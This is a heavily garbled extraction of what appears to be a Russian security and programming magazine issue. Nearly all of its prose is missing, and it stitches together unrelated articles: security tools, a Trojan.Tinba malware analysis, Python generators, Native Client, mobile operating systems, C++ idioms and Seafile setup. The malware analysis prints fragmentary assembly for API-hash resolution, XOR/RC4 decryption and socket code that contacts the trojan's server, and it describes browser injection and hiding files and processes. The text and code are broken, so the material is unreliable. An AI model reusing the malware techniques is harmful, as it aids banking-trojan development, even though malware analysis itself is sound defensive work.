URL: https://github.com/nccgroup/memaddressanalysis

Cisco CDP Spoofer.


SIP Skinny.
VoIP Wars:
Attack of the Cisco Phones (goo.gl/
RTVWbd). Happy hacking Cisco :).

: Jeremy Long
: Windows/
Linux
URL: https://github.com/jeremylong/DependencyCheck

ANDROID

MEM ADDRESS ANALYZER


Android,
,

.
Android . , . ,
, USB
hub, .
.
Android Cluster Toolkit Android. ,
,
USB-. , .
Ruby. :
scan.rb
;
shell.rb shell ;
mdo ADB ,
;
mcmd shell-
,
;
mbb
BusyBox ;
mpull .


, :
X
();
Y ();
: ,
/;
,

.

:
- , . , , ,
. ,
, ,
, . -
. , , .
Dependency-Check ,
. Java- .NET-,
Node.js
JavaScript-.
OWASP A9 Using Components with Known
Vulnerabilities.

Android- .

, ,

, ASLR (Address
Space Layout Randomization).
Python Linux Windows.

, ,
.
, ASLR Windows, DLL
,
.

20

Malware



drobotun@xakep.ru

Trojan.Tinba

JRMurray76@shutterstock.com


20

, . ,
,

, .

. 1. Trojan.
Tinba Symante
. 2. Trojan.Tinba
VirusTotal
. 3.

Trojan.
Tinba

START


,
,
- 19 968 .

- .
,
Zeus Carber.

Trojan.Tinba, ,
- .

. 4.


API-
Trojan.Tinba , , ,
API-.
API- ( API kernel32.dll, ntdll.dll,
ws2_32.dll, wininet.dll nspr4.dll), ,
, . ,
-, ,
-, ,
,
API-.
kernel32.dll (
, ).

kernel32.dll ( , ).
kernel32.dll
PEB _ LDR
_ DATA, Process Environment Block (PEB):

;
PEB
mov esi, fs:30h]
mov esi, esi 0Ch]
;
PEB _ L
_
mov esi, esi 1Ch]
;
kernel32.dll
;
"32"
:
mov ecx, esi 8h]
mov edi, esi 20h]
mov esi, esi
;0320033
"32"
cmp dword ptr edi 0Ch , 0320033h
jne
B

ntdll.dll
_ et odule andle

Catchy32
:
vxheavens.com/dl/ple/
catchy32.zip

Trojan.Win32.Tinba Trend Micro:
www.csis.dk/downloads/
Tinba_White_Paper.pdf

kernel32.dll ,
, .

API GetModuleHandle, :

;
invokx
...

WWW

ebx , "ntdll"



I-

. 5.
API-,


. 6.
API ( ,

Microsoft,
API-)
. 7.
API-


...
;
invokx
...

ws_2_32.dll
_ et odule andle


20


R
I

I
I



R

ebx , "ws2_32"

, ,
. kernel32.dll
28 API-, ntdll.dll ,
ws_2_32.dll .

25 ( CRC-32 ):

;
mov edi, lp llBase ddr
...
...
;
xor edx, edx
:
mov eax, 7
mul edx
mov edx, eax
mov x eax, byte ptr edi
add edx, eax
inc edi
;
cmp byte ptr edi , 0
jn
B
...

INFO

PI

API-
API, Trojan.
Tinba . -, HTTP-
- , ,
. -,
.

JMP ( 0E9h) ,
, , -, .

Microsoft, API (0x88, 0xff, 0x55, 0x88, 0xec),
,
Catchy32 ( ,
, ).
Catchy32
( 580 ). ESI EAX .
:

...
;
:
add
call
...
...
;
add
;
add
;
;
cmp
jb
...


(
,
,

).

-

:).

. 8.


32 PAGE _ READWRITE
API- VirtualProtect,
. ,
JMP .


Trojan.Tinba Winsock API, RC4.
2 ( XOR).
XOR,
. :

;
mov edi, lp eyTable
;
,
mov esi, lp ata
...
...
: inc bl
...
...
mov cl, edi
ecx
;XO
xor
esi , cl
inc esi
dec n ata
jn
B

Catchy32
mov eax, ebx
eax, c_Catchy
eax

esi, eax
ecx, eax
5,
ecx, 5
B


, , GetBaseDelta
ebx, API : invokx <
API-> [ebx], < API>.
, GetBaseDelta invokx ,
. , , - ebx ( ,
):

etBase elta macro reg


local
delta
call delta
delta:
pop reg
sub reg, delta
endm

,
. ( , IP,
URL, , ).
, , , , -

( XOR
).
API- ws2_32.dll:

;
IP
invokx _inet_addr ebx , s ostName ebx
jmpns eax, F
;
U L
invokx _gethostbyname ebx , s ostName ebx
...
...
;
: mov clntSrvc.sin_addr, eax
mov clntSrvc.sin_port, 5000h
mov clntSrvc.sin_family, F_INET
invokx _socket ebx , F_INET, SOC _ST E , 0
;
invokx _connect ebx , hSocket, clntSrvc,
si eof clntSrvc
...
...
;
invokx _send ebx , hSocket, lpContents,
dwContentsLen, 0
...
...
;
invokx _recv ebx , hSocket,
e Buff, 320, 0
...

. 9.
POST-

API- ebx ( ).
firefox.exe, chrome.exe, iexplore.exe .
API RtlAdjustPrivilege
SE _ DEBUG _ PRIVILEGE,
CreateToolhelp32Snapshot, Process32First Process32Next
,
OpenProcess, WriteProcessMemory CreateRemoteThread.

10


,
-,
.

11


20

12

), , ,
.
Internet Explorer - HttpQueryInfoA, HttpSendRequest,
HttpSendRequestEx, HttpEndRequest, InternetCloseHandle,
InternetQueryDataAvailable, InternetReadFile, InternetReadFileEx
InternetWriteFile wininet.dll, Firefox
PR _ Read, PR _ Write PR _ Close nspr4.dll.
( Internet Explorer, Firefox) , API .
, .
Chrome , chrome.dll.
, , . chrome.dll
.
, ,
,
HTTP-, HTTPS, .

13

END
-
,
, . API FindFirstFile, FindNextFile ZwQueryDirectoryFile.

ZwQuerySystemInformation. RegEnumValue ZwEnumerateValueKey.
ZwQuerySystemInformation ,
SYSTEM _ INFORMATION _ CLASS.
SystemProcessInformation, , .

- -
Trojan.Tinba -,
(Carber, Zeus, Gataka
). - INJECTS.TXT.
Carber Zeus. ,
( POST-, GET-

. 10.

. 11.
ZwQueryDirectoryFile
. 12. Trojan.Tinba


Trojan.Tinba (
, API- ,
- ),

.
.

. 13.
API Internet Explorer
Firefox
. 14. API

Chrome


,
Head of Vulnerability Research Group,
Kaspersky Lab

14

, , . 710
, Pinch,
C++. :
, , , . , ,
:). C++
, , C#,
VB.
- .
,
. ,
, Radmin.
, .
, ,
.
, , .


-:
D

X-Shar
X-Shar@ru-sphere.ru

, ,
. ,
, XXI :
MD5-. ,
,
. ?
!


:
( ), ,
. , .
,
(on demand).
:
1. (164, 932, 3022 ),
() , -
( ) ,
. ,
, .
2.
,
? , ,


.
, .

(. ),
.

best pixels@shutterstock.com


][-: on demand

.
, :
. :
///
. VirusTotal
,
30 , ( , );
, , ,

. ,
:
virlist.dwb,
( ) .
, . ,
.
adware, 40 50 (
VT). , , , ,
. :
-
( ) ,

, , -
.
, , , adware VT
30 ().
: . ,
,
(MIRC, , ),
, .
!
3. (Avira, Bitdefender)
Kazy.
: 50 , 40
.
4. ,
.
,
, .
, , .



on demand ,
,
, bash-, MD5 .

:
1. ,

( ? :)),
,
- ,
.
.
2.

MD5? , ,
( ,
MD5-).

(
),
!
,
,
.

,
MD5 , ,
,
,
( , ),
(

,
).
,
. ,
,
, ,
, ,
.
,
.
PE- DOS-,
,
.

,
That
program cannot... .
( ).
3. ,
/ , ,
,
( ).
, , 99% , 50%
?

, .

PE.
, adware, , ,

.

, .
,
( ) 1%

.
(),
:
30% HEUR:Trojan.Win32
15% Trojan.Win32
12% Backdoor.Win32
7% Trojan-Downloader.Win32
6% Packed.Win32
5% Trojan-Dropper.Win32
5% Trojan-Spy.Win32
.
: , , malware-
(,
), ( )
. - 100
VirusSign .



C ,

(
VT). (
AutoCad), ,
,

(
).

- (
),
. (
), . ,
( ), .


2. .
3. .


,
,
. 1.
, ?

:
. , ,
, - . , ?
. 2, , ,

.
Norton Nano: .
Nano
(
), Norton
/, 1% .
,
, .
,
Comodo .
, ,
,
? !
, , ,
. , ,

. , :
,
, .
, .

, ? --.
/
: , , ,
, , ...
, :
1. (keygen/crack).

. 1.
*
. 2.


. 3. :
*

,

.
,
. 3.

. ,
.

Hintau Aliaksei@shutterstock.com




PYTHON
.
, ,
, , . ,
,
. ,
, ,
Python,
. , ?


, , . , thread, stream, flow
. thread , , , stream flow, -
( data flow). , ,
.
, ,
. ,
, . ,
-. -,
stdin, stdout stderr, ,
-.
, , - , ,
.
. - cat file.txt | sed s/foo/bar/g,
, stdout cat stdin sed.

Data Flow Programming. -
, -
. .
-, , stdin , , -

enchantner
, Mirantis Inc
@enchantner

, ,
, . C/C++, , .
(slidesha.
re/1rHhfm7).


Python.
, .
. Python (
) ,
, , iterator iterable.
, , , .
, ,
- for,
__iter__() next() (
Python __next__()). , list , list , . listiterator,
iter() , ,
for map().
, StopIteration.
, ,
, Python 2,
Python 3. six (bit.ly/1lfBzXR).

from __future__ import print_function

# six supplies an Iterator base class that maps next() to __next__(),
# so the same class works on both Python 2 and Python 3
from six import Iterator

class MyIterator(Iterator):
    def __init__(self, step=5):
        self.step = step
    def __iter__(self):
        return self
    def __next__(self):
        self.step -= 1
        # stop once the counter reaches zero
        if not self.step:
            raise StopIteration()
        return self.step

myiterator = MyIterator()
for item in myiterator:
    print(item, end=" ")
print()
"""
4 3 2 1
"""


, . MyIterator
(, ) , .
- , - for ( ).


, , ,
?
, , , -,
list comprehensions.

with open("file.txt", "r") as f:
    mylist = [l for l in f if "foo" in l]
for item in mylist:
    print(item)
"""
Prints every line of file.txt
that contains "foo"
"""
. (
,
), , , ,
. . ,
. , ,
( "foo" , , ).
,
, array? ,
( ) ,

,
O(n). ? , . ?

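with open("file.txt", "r") as f:
    mylist = (l for l in f if "foo" in l)
    # the generator reads lazily, so consume it while the file is still open
    for item in mylist:
        print(item)
"""
Prints every line of file.txt
that contains "foo"
"""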


Python, , .
, ,
, asyncio, Python 3.
( ):
www.dabeaz.com/generators-uk/
www.dabeaz.com/coroutines/

, ,
.
,
, , - . -,

,
. , :

def my_generator(step=4):
    with open("file.txt", "r") as f:
        for l in f:
            if "foo" in l:
                yield l

myiterator = my_generator()
for item in myiterator:
    print(item)
"""
Prints (one at a time) every line of file.txt
that contains "foo"
"""

yield
,
, . ,
,
yield.
, .

, ,
open source ,
,
. range() xrange() Python 2
, ,
, .

def my_generator2(step=4):
    print("First block")
    yield 1
    print("Second block")
    yield 2

myiterator = my_generator2()
next(myiterator)
# "First block"
next(myiterator)
# "Second block"
next(myiterator)
# Traceback: StopIteration

YIELD


? ,
Python, , ( ).
...
, , ,
. , , .

(, Python
"return a, b", . ). ,
, , ?
, , , , -

, , .
? next() ,
? , .
Python 2.5 : .close(), .throw() .send().
, , Data Flow
Programming.
.close() , .throw() :

from __future__ import print_function

import itertools

def my_generator3():
    counter = itertools.count()
    while True:
        yield next(counter)

myiterator = my_generator3()
myiterator2 = my_generator3()
for item in myiterator:
    print(item, end=" ")
    if item == 3:
        myiterator.close()
print()
for item in myiterator2:
    print(item, end=" ")
    if item == 2:
        myiterator2.throw(Exception(""))
print()
"""
0 1 2 3
0 1 2 Traceback (most recent call last):
  File "test.py", line 28, in <module>
    myiterator2.throw(Exception(""))
  File "test.py", line 12, in my_generator3
    yield next(counter)
Exception:
"""

, . , yield (,
, return) . , flow
(, ).
,
MapReduce,
. ,

, Linux,
.
, , .send().

!

from __future__ import print_function

import itertools

def my_coroutine():
    counter = itertools.count()
    while True:
        y = (yield next(counter))
        if y:
            counter = itertools.count(y)

myiterator = my_coroutine()
for item in myiterator:
    print(item, end=" ")
    if item == 1:
        myiterator.send(4)
    elif item == 6:
        myiterator.close()
print()

, , .
,
,
.

: , , .
, Python , ,
, ,
.
(. ). , Apache:

23.34.139.80 - ... "GET /categories/ HTTP/1.1" 200 6394
23.34.139.80 - ... "GET /favicon.ico HTTP/1.1" 404 80
23.34.139.80 - ... "GET /static/img/logo.gif HTTP/1.1" 200 41526
23.34.139.80 - ... "GET /news/story.html HTTP/1.1" 200 6223
23.34.139.80 - ... "GET /about/example.html HTTP/1.1" 200 1223
42. .100.21 - ... "GET /index.html HTTP/1.1" 200 4
,
. , , .
.

"""
0 1 5 6
"""

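from __future__ import print_function

wwwlog = open("access-log")
# the last whitespace-separated column of each line is the response size
bytecolumn = (line.rsplit(None, 1)[1] for line in wwwlog)
# "-" means no size was logged, so skip it
bytes = (int(x) for x in bytecolumn if x != '-')
print("Total", sum(bytes))

coroutine. , , ,
,
gevent, tornado eventlet. , , , ,
Python

, ,
? - - ,
, .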


itertools
(https://docs.python.org/3/library/itertools.html), ,
,
.
Python
Module of the Week (Doug Hellmann):
pymotw.com/2/itertools/.
: , , : sahandsaba.com/pythoniterators-generators.html.

, ,
,
, ,
, ,
.


. Python , , ,
.
, . !


C++


NATIVE CLIENT


. , Chrome .
, , -
. ,
,
:), .

deeonis
deeonis@gmail.com

VladisChern@shutterstock.com


.
JavaScript HTML 5 , C C++.
, -
.
Native Client
Google.


NATIVE CLIENT
NaCl
2008 . , ,
.
legacy NaCl. . , , , ,
,
Native
Client .
, , , . 2D- 3D-,
,
. , Google. , ,

.
, Google
. (!) ,

.
. -!
,
Windows, OS X , , Linux.
x86- ARM.
2011- NaCl Chrome. , ,
-.
ActiveX, ( IE), , , Native Client
BSD.
NaCl .

GameDev

NaCl



NaCl

NATIVE CLIENT
Native Client . ,
Google NaCl Quake. ,
, 1996 ,
, (
, , ) .

. , -
, : , , CPU
,
,
. ,

-,
.
, - .
,
personal data . ,
, .


Native Client ,
C++
. NaCl (, ) -,

API.
Portable Native Client (PNaCl).
, , .
. API,
, NaCl.


API,
.
,
Native Client,
, , .
, NaCl-
. ,
.
C++ JavaScript . ,
, .

HELLO NACL
Native Client, - ... . Hello World, Hello NaCl.
Native Client SDK.
. . ,
Python 2.7 make.
SDK -, localhost.
:

$ cd pepper_$(VERSION)/getting_started
$ make serve

HelloTutorialModule.postMessage('hello');

Native Client

, . - HandleMessage
hello_tutorial.cc. TODO, , .

PostMessage, .

SDK ,
$(VERSION). -. PNaCl
31 . ,
SDK
Chrome.

NaCl-.
pepper_$(VERSION)/getting_started/part1 . index.html.
HTMLLayout JS- . ,
nmf, hello_tutorial.nmf. , HTML, NaCl- .
hello_tutorial.cc,
C++, Makefile.
:

virtual void HandleMessage(const pp::Var& var_message) {
  if (!var_message.is_string())
    return;
  std::string message = var_message.AsString();
  pp::Var var_reply;
  if (message == "hello") {
    var_reply = pp::Var("hello from NaCl");
    PostMessage(var_reply);
  }
}
, ,
, - . Var
C++.
-
. ,
hello, ,
Var.
index.html NaCl. JS alert :

$ cd pepper_$(VERSION)/getting_started/part1
$ make
-,
SDK, URL:
http://localhost:5103/part1,
LOADING...
SUCCESS. , ?
Hello NaCl, . index.
html JavaScript- moduleDidLoad. ,
HTML-
,
. moduleDidLoad NaCl- hello_tutorial
SUCCESS,
/part1.
hello,
postMessage . :

function moduleDidLoad() {
  HelloTutorialModule = document.getElementById('hello_tutorial');
  updateStatus('SUCCESS');
  // Send a message to the Native Client module
  HelloTutorialModule.postMessage('hello');
}

function handleMessage(message_event) {
  alert(message_event.data);
}

WWW

Native Client:
https://developer.chrome.com/nativeclient
Native Client
SDK
:
https://developer.chrome.com/nativeclient/sdk/download

, http://localhost:5103/
part1. message box hello from NaCl,
, .

. , ,
, Native Client .
Java,
,
ActiveX Microsoft. , Chrome
Native Client.


Ozgur Coskun@shutterstock.com



irairache@gmail.com

WINDOWS PHONE, BAIDU YI,


UBUNTU TOUCH, TIZEN, WEBOS,
FIREFOXOS


WARNING


IT-.

,
.

Google Play App Store


, . -,
, . ,
. ][
,
.

PHONEGAP
phonegap.com


-

HTML, CSS JS. :

INFO
2000-
Nokia
.

Symbian OS.


1999 2012 .

. ,
Symbian

EPOC,


1980-
.


iOS;
Android;
Windows Phone;
BlackBerry;
Bada;
Symbian;
WebOs;
Ubuntu Touch;
Tizen.

POSIX
Linux
Nokia X Platform;
Baidu Yi;
Ubuntu Touch;
Tizen;
WebOS;

Firefox OS;
Sailfish OS;
.;
MIUI.

QNX
BlackBerry 10.

WINDOWS

Windows Phone.

XNU
iOS.

NOKIA X PLATFORM

https://developer.nokia.com/nokia-x/platform-overview
Android Open Source
Project. ++ Java.
Nokia 2012 . Microsoft
Mobile ( ,

Windows Phone).
, ,
. Nokia X Platform
.
Android-,
Nokia (HERE Maps, MixRadio, Nokia Express)
Microsoft (Outlook, ).

,
75% Android-
.
Nokia X Services SDK
Nokia API,
HERE Maps, Nokia Notifications
Nokia Payment. Nokia X Platform
Android.
Nokia Store.
(, ) Google Play.
Quality Assurance Review.

Developers checkpoints

Java
Nokia SDK
Nokia API
Nokia Store


INFO

Baidu.
,

,
. :
-,
,

.


BAIDU YI
rom.baidu.com

OC
Baidu.
Dell.
2011 .
Android . Google (, )
Baidu,

.
Baidu Yi
.

.
,
Google Translate.
, Baidu Yi . , .

Developers checkpoints


Baidu Yi SDK
Java
Baidu Yi App Store

UBUNTU TOUCH
UBUNTU.

UNITY

INFO

Canonical Ltd.


Open Source,
. ,





.

UBUNTU TOUCH
ubuntu.com

Canonical Ltd.
Ubuntu Touch 2
2013 . Ubuntu Touch

Ubuntu.
Unity
.
, Ubuntu Touch, :
Huawei Ascend P1, Meizu MX3 Meizu
MX4. Android-,

CyanogenMod. : wiki.ubuntu.com/
Touch/Devices.

Ubuntu Touch:
HTML + CSS + JS;
Qt + QML.
(app) (Scope).

Developers checkpoints

Qt
QML
Ubuntu SDK
Ubuntu Store


TIZEN

INFO

www.tizen.org

Tizen

.

:
-
;

Tizen-;

;
;
,
;
;

.
,
irairache@gmail.com.

Tizen
Association. ( Huawei, Intel, Samsung,
Panasonic ),
2012 . 5
2012 . Limo.
, Tizen
Smart TV.
2014
Samsung Z.
Tizen Association : , , ,
. Tizen (HTML, CSS, JS) Java.

Developers checkpoints

Eclipse
Tizen SDK
GWT SDK
Tizen WEB API

Apache Ant
Java
Tizen Store

Google Play > 1,3


App Store > 1,2
Windows Phone Store > 300
BlackBerry App World > 230
Firefox Market Place > 4

Windows Phone Store Google


Play Android Market, .
2014- 300 , .
105 ( ).
Microsoft .

INFO

WEBOS

WebOS
Palm OS.

PalmGear (palmgear.
com),

50 .
Palm
OS
,
,


.

www.openwebosproject.org

Palm OS.
8
2009 . 2011 2013 HP. webOS
LG Electronics.
, Smart TV.

webOS SDK.
C++ ( OpenGL) HTML (, CSS JS).

App Catalog.

Developers
checkpoints

webOS SDK
C++
OpenGL

INFO
. .
20 ,
, . ,
:).


BLACKBERRY 10

INFO

blackberry.com

BlackBerry ( Research in Motion).



. 2000 BlackBerry OS.
. ,
BlackBerry, ,
, .
C++ BlackBerry SDK.
BlackBerry OS Android apk2barVerifier apk2bar.
BlackBerry App
World
.
. , - , :
, Google Play , App World . - , .

BlackBerry
-. :
BlackBerry Porsche
Design P9982

20132014

(8 ,
2 ). ,


1700 .

Developers checkpoints

C++
BlackBerry Native SDK
BlackBerry App World

FIREFOX OS

mozilla.org/en-US/firefox/os/

Developers
checkpoints

HTML5
CSS
JavaScript
WebAPI
Firefox Browser
Firefox OS Simulator
Firefox Market Place

Mozilla
Foundation. 2 2013 .

: ZTE Open, Alcatel
One Touch Fire H, Huawei Y300II, Geeksphone Peek
. HTML5
Gecko.
, ,
-. Firefox Market Place.

, Firefox
OS . , Firefox OS -, Web API .

SAILFISH OS

Developers checkpoints

SailfishOS Alpha SDK


Qt

QML
Nokia X Store Yandex.Store

https://sailfishos.org

INFO

Jolla. , Nokia
- MeeGo.
Sailfish OS 22 2012 .
20 2013-
. Jolla,
-. ,
Sailfish OS , Nokia N9.
Qt + QML Sailfish OS SDK ( OS X,
SDK ).
Sailfish OS
Android- ,
MeeGo.
Sailfish Jolla SDK (
OS X, ),
Qt Sailfish Silica API.
Jolla Store (harbour.jolla.com).



Joll
: .


: .Shell , . Google.Maps, . Gmail


.

INFO

19 2014 Android.
, , ,
Huawei Honor 3 Yandex Explay Flame.
Android 4.2.2 (Jelly Bean).
: .Shell
, .
Google.Maps, . Gmail
.
. Android.
, ,
.
. (store.yandex.ru). -
Android (goo.gl/ffuE4U). .



, ,

.
:

. ,


2015
iPhone 6,
YotaPhone,
.. ,

. ;).

kit.yandex.ru

INFO



?.

:
,
,
.

.

Developers checkpoints

Eclipse
Android SDK

Java
Yandex.Store

REPLICANT

Developers
checkpoints

www.replicant.us

Android c
100%- . , ,
.
, , ,
CyanogenMod.
Replicant , Samsung Galaxy Nexus.
Replicant Google Play , Replicant
SDK. , , .

Eclipse
Replicant SDK
Java

MIUI

INFO

en.miui.com



,

Android,
Google.

INFO
,
MIUI,

, iPhone
(Foxconn).

Developers checkpoints

Java

Eclipse

Android SDK

Xiaomi Tech.
Android,
iOS. ,
,

.
.
(https://vk.com/miuisu),


Android.
Google Play
MIUI.


I R

Mail.Ru Group ,
. ,
, , ,
,
.
,
@corp.mail.ru. :)


lozovsky@glc.ru

, ,
Mail.Ru Group .
, (, , ICQ, ,
), (Hi-Tech, , ), (, , , ) , , (Russian Code Cup, Russian Design Cup, Russian
AI Cup, )
(Tarantool, centrifuge).
Mail.Ru Group ,
, .
!

MAIL.RU GROUP?
, :
, , . ICQ.
ICQ 6,7
( 11 )! ,
(ICQ Android). , , ICQ Android :
, , .
. , , ,
, -
!
, ,
. , .



ICQ Android


ICQ

,
Android, , .
. Android- .
, ( ) . , , , , ,
. , ...
, -,
ICQ
. ,

.
. : goo.gl/d79gts.
: !

,
. ,
.
,
: www.kaspersky.ru/crackme/crackers.

R D R

. (:
,
:))!

I -

- ,
,
.
lozovsky@glc.ru
. , , . ,
, ,
.

INFO

,


APK,


s.danilchenko@corp.
mail.ru.


,


, . ,
. - ,
(
, ) , -
, ,
,
...
. :)

ICQ, , , , ,
,
. . :
;
,
-, ;
,
.

ICQ .


. :
,
.
. ?
, ,

, ,
,


.



,
, .
, .
!


++


qua ,
++

qualab@gmail.com


SQL-
.
boost::variant. ,

RPC-. C++.
, API.
,

. !

,
,
C++, , ,
.
, , ,

. , C++.

C++
C++ ,
. , 90%
, . , , , .
, SQL ,
.
RPC-, , ,

API RPC-.
,
,
,
SQL-,
, - .

.



C++
. ,
, , , -.
. , :
. , .
:

class IGoods
{
public:
virtual std::string Name() const = 0;
virtual int TypeID() const = 0;
virtual float Price() const = 0;
};
, , , ,
Name, TypeID Price, , :

class Candies : public IGoods
{
public:
    static const int TYPE_ID = 9001;
    Candies(std::string const& name, float price);
    virtual std::string Name() const override { return m_name; }
    virtual int TypeID() const override { return TYPE_ID; }
    virtual float Price() const override { return m_price; }
private:
    std::string m_name;
    float m_price;
};

,
, . ,
, , - , , ,
, .
:
,
; , ,
switch, - case- ;
, , -
, , ,
JSON- SQL-;
, -.
, , , , , , , C++, :
, , -,
;
: , . , ,
, ,
, std::shared_ptr std::unique_ptr.
, , ;
std::unique_ptr
Clone , , , std::shared_ptr, .

C++,


, .
,
:

std::deque<std::unique_ptr<IGoods>> goods;
std::unique_ptr<IGoods> result =
GoodsFactory::Create<Candies>();
goods.push_back(std::move(result));


.

std::deque<std::unique_ptr<IGoods>>
another(goods.size());
std::transform(goods.begin(),
goods.end(), another.begin(),
[](std::unique_ptr<IGoods>& element) {
return element->Clone();
}
);
C++, ,
,
.
C++
, ?

-?
-, .


.
C++.
, , ,
, !
,
, -,
, ? , .

,
Pimpl Double
dispatch


#include <memory>
#include <string>

// Public API: the interface class that client code works with
class object
{
public:
    object();
    virtual ~object();
    virtual bool is_null() const;
    virtual std::string to_string() const;
protected:
    // Forward declaration of the implementation class
    class data;
private:
    std::shared_ptr<data> m_data;
};

// Implementation of object, kept out of the public API (Pimpl)
class object::data
{
public:
    data() { }
    virtual ~data() { }
    virtual bool is_null() const { return true; }
    virtual std::string to_string() const { return "null"; }
};

// Public API: a class derived from object
class flower : public object
{
public:
    flower(std::string const& name);
    virtual bool is_null() const override;
    virtual std::string to_string() const override;
    virtual std::string name() const;
    virtual void rename(std::string const& name);
protected:
    // Forward declaration of the implementation class
    class data;
};

// Implementation of flower, kept out of the public API (Pimpl)
class flower::data : public object::data
{
public:
    static const std::string FLOWER_UNKNOWN;
    data()
        : m_name(FLOWER_UNKNOWN) {
    }
    data(std::string const& name)
        : m_name(name) {
    }
    virtual bool is_null() const override { return false; }
    virtual std::string to_string() const override {
        return "flower: " + m_name;
    }
    virtual std::string name() const { return m_name; }
    virtual void rename(std::string const& name) { m_name = name; }
private:
    std::string m_name;
};
, , ,
. , .

object rose = flower("rose");
object none;
std::vector<object> garden;
garden.push_back(std::move(rose));
garden.push_back(std::move(none));
garden[1] = flower("gladiolus");
std::for_each(garden.begin(), garden.end(),
    [](object const& element) {
        std::cout << element.to_string() << std::endl;
    }
);


C++ ,
operator -> .
const, non-const

API .
, .
object,
. , shoes:

class shoes : public object
{
public:
    shoes(long long price);
    virtual bool is_null() const override;
    virtual std::string to_string() const override;
    virtual long long price() const;
    virtual void discount(long long price);
protected:
    class data;
};
shoes::data flower::data. , :

garden.push_back(shoes(100000000000LL));
, 100 .
, ,
. , , std::vector<flower>.
,
, ,
object.
C++ . ! . C++.


, Clone, .
.
, ,
. .
, copy-on-write (COW), C++ , Qt, COW ,
(QString),
.
:
;
const non-const,
, - ;

,
operator ->, , const non-const.
operator -> , ; operator -> , , .
, , .
,
, , .
, :

template <class data_type>
class copy_on_write
{
public:
    copy_on_write(data_type* data)
        : m_data(data) {
    }
    // Read access: the data stays shared, nothing is copied
    data_type const* operator -> () const {
        return m_data.get();
    }
    // Write access: detach into a private copy if the data is shared
    data_type* operator -> () {
        if (!m_data.unique())
            m_data.reset(new data_type(*m_data));
        return m_data.get();
    }
private:
    std::shared_ptr<data_type> m_data;
};
-
,
, , , ,
COW C++. ,
.
, , object:

class object
{
...
protected:
class data;
private:
copy_on_write<data> m_data;
};
, ,
.
,
C++ ,
, , . -,
m_data->method(arguments), ,

, stack trace,


, .
, Pimpl Double dispatch
, .



, , , ,
SQL- .
, API , , ( ,
API,
).
,
, , , C++.
SQL-. Boost.Preprocessor object.

// SQL text with named placeholders, wrapped in db::SqlQuery
db::SqlQuery query("select * from users as u "
                   "where u.type = $(usertype) "
                   "and u.registered >= $(datetime) "
                   "limit 10");
// The placeholders are bound through operator ()
db::SqlQueryResult result = query("admin", datetime::today());
// Walk over the rows of the result
std::for_each(result.begin(), result.end(),
    [](db::SqlQueryRow const& row)
    {
        // A cell is an object and may be null
        object login = row["login"];
        if (login.is_null())
            std::cout << "not specified";
        else
            std::cout << row["login"];
        // A cell compares directly with a literal
        if (row["status"] == "deleted")
            std::cout << " (deleted)";
        std::cout << std::endl;
    }
);
db::SqlQuery::operator() object, implicit object:

class object
{
public:
template <typename value_type>
object(value_type const& value);
...
};


object integer, boolean, floating, text, datetime ,
object .
, , ,
,
bool:

class boolean : public object
{
public:
    boolean(bool value)
        : object(value) {
    }
    ...
protected:
    class data;
    friend class object;
};
// The specialization must match the template's parameter type
template<>
object::object(bool const& value)
    : m_data(new boolean::data(value)) {
}
, , .
,
object , -
. ,
,
, , . object ,
.
, object
, . begin(), end(), size(), operator [] :

object result = query("admin", datetime::today());
std::for_each(result.begin(), result.end(),
    [](object const& row) {
        std::for_each(row.begin(), row.end(),
            [](object const& cell) {
                std::cout << cell.to_string() << ' ';
            }
        );
        std::cout << std::endl;
    }
);



, ,
Pimpl. :
. get_ set_
, . .




. , C++, C# Java
. , , ! ,
API-
( ).
.
, ,
, ,
, .
C++, ,
, .

, ,
object, . ,
, , , , !
,
, , , .
C++,
,
( ) copy-on-write.
, . : , ,
. ,
, . , API
, , ,
.

,
.


, , API C++
, RPC-
. ,
,
. ,

,
. copy-on-write
operator ->
const non-const ,
, , , . , ,
,
.
new .
, , . ,
, - , .
.
, Pimpl,
, .
API,
C++.
, , . ,
,
- .
API ,
. , ,
API, .


Unixoid


Fer Gregory@shutterstock.com


androidstreet.net


DROPBOX




, email, Twitter
. Dropbox, Google Drive
. ,
0 $ .
: , ,
-. , .
Seafile


, Dropbox. Linux,
, ,
-,
.
/
, (
).

, ,
, . OwnCloud Seafile. , Dropbox, . , .

, OwnCloud
.
OwnCloud
. PHP, , , .
Seafile, , ,
Python -
- , , .
RasPi
, (100
~5%
).
. OwnCloud ,
. ,
.
, OwnCloud -

INFO
Seafile
RasPi
.
,
Seafile
(goo.gl/a6hCjK).

FI

FI
I

.
Seafile ,
,
.
, Seafile ,
OwnCloud, .
Seafile , Git ( ),
.
,
, , , (, Git) .
.
Seafile Dropbox- ,
. ,
OwnCloud
, - , KDE -,
,

OwnCloud.

, Seafile? , -, ,
, . , Dropbox:
( ) , . ,


Seafile
Android

, memcached
Ceph Amazon S3. , ,

10 / ( ).
Seafile .
, . , . ,
. - (

INFO
Seafile ArchLinux,
libselinux AUR:
"yaourt -S libselinux".
,
.
Windows, Linux OS X.
Qt ,
FreeBSD. Android (Seadroid Seafile iOS, ).
, Seafile .
. ,
.
, ,
( Markdown), ,
Wiki , . - Word, ,
OwnCloud, , . , , doc- PDF -.
, , ,
. 2
,
cloud.seafile.com, . ,
.
,
. Seafile
, ,

INFO



seafile-ignore.txt

(, *.avi,
*.mkv, *.mp3).

INFO
Seafile seaf-cli.

.

FI

Seafile
Git, ,

(, Seafile)
(branch), , ,
.
Seafile
/: local master. () ,
, , Git,
,
( ) :
1. Seafile (worktree) (inotify
Linux, fsnotify OS X).
2. .
3. master.
4. ,
.
5.
(master).
, Git,
, Git
( git pull,
git add, git commit ). Seafile
,
, ,

.
Seafile . -,
,
, , , , . -, Seafile
,

. ,
(, , ).
, Seafile
Git ()

, Git .


). -
JavaScript,
.
,
.
,
.
AES-256 CBC, (
PBKDF2).

Seafile

Seafile
RasPi. , -
- .
. Ubuntu :

$ cd ~
$ mkdir seafile
$ cd seafile
$ sudo apt-get install python2.7 python-setuptools python-simplejson python-imaging sqlite3
$ wget https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.5_x86-64.tar.gz
$ tar -xzf seafile-server_3.1.5_x86-64.tar.gz
$ cd seafile-server*
$ ./setup-seafile.sh
, :
1. Server Name .
2. This servers IP or domain IP- .
3. ccnet (10001).
4. (
~/seafile-data).
5. seafile server (12001).
6. seafile fileserver (8082).
7. <Enter>, <Enter>.
. Seafile:

$ ./seafile.sh start
$ ./seahub.sh start

- email . localhost:8000,
- . , ,
Seafile,
. , ,
.
Seafile, ,
,
root.
Seafile .

:
Seahub - Seafile, Python
Django. -


- Gunicorn, Python.
